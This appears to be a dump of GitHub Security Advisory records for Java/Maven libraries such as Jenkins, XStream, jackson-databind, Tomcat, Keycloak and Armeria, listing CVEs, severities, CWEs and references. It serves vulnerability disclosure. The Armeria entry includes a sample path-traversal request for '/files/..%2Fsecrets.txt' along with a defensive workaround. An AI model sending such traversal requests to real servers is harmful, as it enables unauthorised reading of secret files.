{'https://lists.apache.org/thread.html/r2de526726e7f4db4a7cb91b7355070779f51a84fd985c6529c2f4e9e@%3Cissues.activemq.apache.org%3E', 'https://lists.apache.org/thread.html/r826a006fda71cc96fc87b6eca4b5d195f19a292ad36cea501682c38c@%3Cissues.activemq.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/12/msg00001.html', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2', 'https://nvd.nist.gov/vuln/detail/CVE-2020-26217', 'https://security.netapp.com/advisory/ntap-20210409-0004/', 'https://lists.apache.org/thread.html/redde3609b89b2a4ff18b536a06ef9a77deb93d47fda8ed28086fa8c3@%3Cissues.activemq.apache.org%3E', 'https://github.com/x-stream/xstream', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a', 'https://www.debian.org/security/2020/dsa-4811', 'https://lists.apache.org/thread.html/r7c9fc255edc0b9cd9567093d131f6d33fde4c662aaf912460ef630e9@%3Ccommits.camel.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://x-stream.github.io/CVE-2020-26217.html'}
null
Maven
GHSA-p92q-7fhh-mq35
Cross-Site Request Forgery in Jenkins
A cross-site request forgery (CSRF) vulnerability in Jenkins 2.329 and earlier, LTS 2.319.1 and earlier allows attackers to trigger build of job without parameters when no security realm is set.
{'CVE-2022-20612'}
2022-04-22T15:47:00.669885Z
2022-01-21T23:37:57Z
MODERATE
null
{'CWE-352'}
{'https://github.com/jenkinsci/jenkins', 'https://www.jenkins.io/changelog-stable/#v2.319.2', 'http://www.openwall.com/lists/oss-security/2022/01/12/6', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://www.jenkins.io/security/advisory/2022-01-12/#SECURITY-2558', 'https://www.jenkins.io/changelog/#v2.330', 'https://nvd.nist.gov/vuln/detail/CVE-2022-20612'}
null
Maven
GHSA-rpj6-2q8r-98f8
Incorrect default pattern in Jenkins Audit Trail Plugin
Jenkins Audit Trail Plugin 3.6 and earlier applies pattern matching to a different representation of request URL paths than the Stapler web framework uses for dispatching requests, which allows attackers to craft URLs that bypass request logging of any target URL.
{'CVE-2020-2287'}
2021-04-22T22:16:34Z
2022-02-10T20:29:39Z
MODERATE
null
{'CWE-435'}
{'http://www.openwall.com/lists/oss-security/2020/10/08/5', 'https://nvd.nist.gov/vuln/detail/CVE-2020-2287', 'https://www.jenkins.io/security/advisory/2020-10-08/#SECURITY-1815'}
null
Maven
GHSA-8fp4-rp6c-5gcv
Path Traversal in com.linecorp.armeria:armeria
### Impact An attacker can access an Armeria server's local file system beyond its restricted directory by sending an HTTP request whose path contains `%2F` (encoded `/`), such as `/files/..%2Fsecrets.txt`, bypassing Armeria's path validation logic. ### Patches Armeria 1.13.4 or above contains the hardened path validation logic that handles `%2F` properly. ### Workarounds This vulnerability can be worked around by inserting a decorator that performs an additional validation on the request path, e.g. ```java Server .builder() .serviceUnder( "/files", FileService .of(...) .decorate((delegate, ctx, req) -> { String path = req.headers().path(); if (path.contains("%2f") || path.contains("%2F")) { return HttpResponse.of(HttpStatus.BAD_REQUEST); } return delegate.serve(ctx, req); }) ) .build() ``` ### For more information If you have any questions or comments about this advisory: * Open an issue in [line/armeria](https://github.com/line/armeria) * Chat with us at [Slack](https://armeria.dev/s/slack) ### Credits This vulnerability was originally reported by Abdallah Zaher ([elcayser-0x0a](https://hackerone.com/elcayser-0x0a?type=user)).
{'CVE-2021-43795'}
2022-03-03T05:13:34.204718Z
2021-12-02T22:25:54Z
HIGH
null
{'CWE-22'}
{'https://github.com/line/armeria', 'https://github.com/line/armeria/commit/e2697a575e9df6692b423e02d731f293c1313284', 'https://github.com/line/armeria/pull/3855', 'https://github.com/line/armeria/security/advisories/GHSA-8fp4-rp6c-5gcv', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43795'}
null
Maven
GHSA-2rvv-w9r2-rg7m
Information Disclosure in Apache Tomcat
When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances.
{'CVE-2021-24122'}
2022-03-03T05:13:27.596547Z
2021-05-13T22:30:02Z
MODERATE
null
{'CWE-200'}
{'https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52%40%3Cannounce.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/rb32a73b7cb919d4f44a2596b6b951274c0004fc8b0e393d6829a45f9@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-24122', 'https://security.netapp.com/advisory/ntap-20210212-0008/', 'https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r7e0bb9ea415724550e2b325e143b23e269579e54d66fcd7754bd0c20@%3Cdev.tomcat.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html', 'http://www.openwall.com/lists/oss-security/2021/01/14/1', 'https://lists.apache.org/thread.html/r776c64337495bf28b7d5597268114a888e3fad6045c40a0da0c66d4d@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/rca833c6d42b7b9ce1563488c0929f29fcc95947d86e5e740258c8937@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r7382e1e35b9bc7c8f320b90ad77e74c13172d08034e20c18000fe710@%3Cdev.tomee.apache.org%3E'}
null
Maven
GHSA-56p8-3fh9-4cvq
XStream is vulnerable to an attack using Regular Expression for a Denial of Service (ReDos)
### Impact The vulnerability may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. ### Patches If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16. ### Workarounds See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. ### References See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21348](https://x-stream.github.io/CVE-2021-21348.html). ### Credits The vulnerability was discovered and reported by threedr3am. ### For more information If you have any questions or comments about this advisory: * Open an issue in [XStream](https://github.com/x-stream/xstream/issues) * Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)
{'CVE-2021-21348'}
2022-03-03T05:14:00.363798Z
2021-03-22T23:29:09Z
MODERATE
null
{'CWE-502', 'CWE-400'}
{'https://github.com/x-stream/xstream/security/advisories/GHSA-56p8-3fh9-4cvq', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://x-stream.github.io/security.html#workaround', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21348', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/', 'http://x-stream.github.io/changes.html#1.4.16', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html', 'https://www.debian.org/security/2021/dsa-5004', 'https://x-stream.github.io/CVE-2021-21348.html', 'https://security.netapp.com/advisory/ntap-20210430-0002/', 'https://github.com/x-stream/xstream', 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E', 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}
null
Maven
GHSA-cvm9-fjm9-3572
Unsafe Deserialization in jackson-databind
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS.
{'CVE-2020-36181'}
2022-04-22T17:30:25.727588Z
2021-12-09T19:16:10Z
HIGH
null
{'CWE-502'}
{'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://github.com/FasterXML/jackson-databind', 'https://security.netapp.com/advisory/ntap-20210205-0005/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36181', 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html', 'https://github.com/FasterXML/jackson-databind/issues/3004', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}
null
Maven
GHSA-89qr-369f-5m5x
Unsafe Deserialization in jackson-databind
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS.
{'CVE-2020-36182'}
2022-04-22T18:30:52.371623Z
2021-12-09T19:15:46Z
HIGH
null
{'CWE-502'}
{'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://github.com/FasterXML/jackson-databind', 'https://security.netapp.com/advisory/ntap-20210205-0005/', 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html', 'https://github.com/FasterXML/jackson-databind/issues/3004', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36182', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}
null
Maven
GHSA-w9p3-5cr8-m3jj
Deserialization of Untrusted Data in Log4j 1.x
JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
{'CVE-2022-23302'}
2022-04-22T15:47:40.262699Z
2022-01-21T23:27:14Z
HIGH
null
{'CWE-502'}
{'https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23302', 'https://security.netapp.com/advisory/ntap-20220217-0006/', 'https://logging.apache.org/log4j/1.2/index.html', 'http://www.openwall.com/lists/oss-security/2022/01/18/3', 'https://github.com/apache/logging-log4j1', 'https://www.oracle.com/security-alerts/cpuapr2022.html'}
null
Maven
GHSA-4fgq-gq9g-3rw7
Improper Verification of Cryptographic Signature in keycloak
It was found that Keycloak's SAML broker, versions up to 6.0.1, did not verify missing message signatures. If an attacker modifies the SAML Response and removes the <Signature> sections, the message is still accepted, and the message can be modified. An attacker could use this flaw to impersonate other users and gain access to sensitive information.
{'CVE-2019-10201'}
2022-03-03T05:13:13.980995Z
2019-09-23T18:32:16Z
MODERATE
null
{'CWE-347'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-10201', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10201'}
null
Maven
GHSA-758m-v56v-grj4
jackson-databind mishandles the interaction between serialization gadgets and typing
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane.
{'CVE-2020-10969'}
2022-03-03T05:14:01.552129Z
2020-04-23T21:36:03Z
HIGH
null
{'CWE-502'}
{'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://github.com/FasterXML/jackson-databind', 'https://security.netapp.com/advisory/ntap-20200403-0002/', 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/FasterXML/jackson-databind/issues/2642', 'https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-10969', 'https://www.oracle.com/security-alerts/cpuoct2020.html'}
null
Maven
GHSA-c597-f74m-jgc2
Improper Certificate Validation and Improper Validation of Certificate with Host Mismatch in Keycloak
A flaw was found in Keycloak in versions before 10.0.0, where it does not perform the TLS hostname verification while sending emails using the SMTP server. This flaw allows an attacker to perform a man-in-the-middle (MITM) attack.
{'CVE-2020-1758'}
2022-03-03T05:13:28.909615Z
2022-02-09T00:56:26Z
MODERATE
null
{'CWE-295', 'CWE-297'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-1758', 'https://issues.redhat.com/browse/KEYCLOAK-13285', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1758'}
null
Maven
GHSA-5c66-v29h-xjh8
XSS Cross Site Scripting
### Impact It is possible to persistently inject scripts in XWiki. For unregistred users: - By filling simple text fields For registered users: - By filling their personal information - (if they have edit rights) By filling the values of static lists using App Within Minutes That can lead to user's session hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other security vulnerabilities. That can also lead to the attacker taking over an account. If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account. ### Patches It has been patched on XWiki 12.8 and 12.6.3. ### Workarounds There is no easy workaround except upgrading XWiki. ### References https://jira.xwiki.org/browse/XWIKI-17374 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki](https://jira.xwiki.org) * Email us at our [security mailing list](mailto:security@xwiki.org)
{'CVE-2021-29459'}
2021-04-20T18:36:33Z
2021-04-22T16:11:55Z
CRITICAL
null
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-29459', 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5c66-v29h-xjh8'}
null
Maven
GHSA-4vhj-98r6-424h
In Bouncy Castle JCE Provider it is possible to inject extra elements in the sequence making up the signature and still have it validate
In Bouncy Castle JCE Provider version 1.55 and earlier the DSA does not fully validate ASN.1 encoding of signature on verification. It is possible to inject extra elements in the sequence making up the signature and still have it validate, which in some cases may allow the introduction of 'invisible' data into a signed structure.
{'CVE-2016-1000338'}
2022-04-27T13:30:13.955304Z
2018-10-17T16:23:26Z
HIGH
null
{'CWE-347'}
{'https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E', 'https://github.com/advisories/GHSA-4vhj-98r6-424h', 'https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000338', 'https://github.com/bcgit/bc-java', 'https://access.redhat.com/errata/RHSA-2018:2669', 'https://access.redhat.com/errata/RHSA-2018:2927', 'https://github.com/bcgit/bc-java/commit/b0c3ce99d43d73a096268831d0d120ffc89eac7f#diff-3679f5a9d2b939d0d3ee1601a7774fb0', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://usn.ubuntu.com/3727-1/'}
null
Maven
GHSA-grpf-gg7v-5g5h
SQL Injection in Apache SkyWalking
Only when using H2/MySQL/TiDB as Apache SkyWalking storage, there is a SQL injection vulnerability in the wildcard query cases.
{'CVE-2020-13921'}
2022-03-03T05:13:44.746825Z
2021-05-07T15:53:31Z
CRITICAL
null
{'CWE-89'}
{'https://github.com/apache/skywalking/pull/4970', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13921', 'https://lists.apache.org/thread.html/r6f3a934ebc54585d8468151a494c1919dc1ee2cccaf237ec434dbbd6@%3Cdev.skywalking.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2020/08/05/3', 'https://github.com/apache/skywalking/commit/fb7912c6bdda06a233f4b3e18e71a87d3e4a8951'}
null
Maven
GHSA-m7jv-hq7h-mq7c
Infinite Loop in Apache Tomcat
The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service.
{'CVE-2020-13935'}
2022-04-22T17:45:17.092400Z
2022-02-08T22:05:17Z
HIGH
null
{'CWE-835'}
{'https://lists.debian.org/debian-lts-announce/2020/07/msg00017.html', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://usn.ubuntu.com/4448-1/', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://kc.mcafee.com/corporate/index?page=content&id=SB10332', 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00088.html', 'https://security.netapp.com/advisory/ntap-20200724-0003/', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E', 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00084.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://usn.ubuntu.com/4596-1/', 'https://www.debian.org/security/2020/dsa-4727', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13935', 'https://lists.apache.org/thread.html/r4e5d3c09f4dd2923191e972408b40fb8b42dbff0bc7904d44b651e50@%3Cusers.tomcat.apache.org%3E'}
null